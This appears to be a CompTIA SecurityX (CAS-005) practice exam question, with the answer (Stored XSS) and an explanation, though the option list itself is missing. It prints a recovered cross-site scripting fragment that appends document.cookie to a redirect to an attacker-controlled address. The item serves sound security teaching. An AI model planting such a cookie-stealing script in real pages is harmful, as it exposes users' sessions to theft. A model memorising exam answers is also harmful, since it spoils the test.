CompTIA SecurityX (CAS-005) — Question 302

During a forensic review of a cybersecurity incident, a security engineer collected a portion of the payload used by an attacker on a compromised web server. Given the following portion of the code:

..asd...document.location="https://10.10.1.2/?"x“+document.cookie; ..12..fa..<>...ash214%621...41..2...8.8.

Which of the following best describes this incident?

Answer options

Correct answer: C

Explanation

The correct answer is C, Stored XSS. The payload reads the document.cookie property and appends it to a document.location redirect, so the attacker is attempting to access cookies stored in the user's browser and send them to the address in the script. The payload was also recovered from the web server itself, which is consistent with script stored on the server and delivered to visitors. Options A, B, and D do not fit this scenario: XSRF involves unauthorized commands issued on behalf of a user, command injection involves executing arbitrary commands on the server, and SQL injection targets database queries rather than manipulating client-side scripts.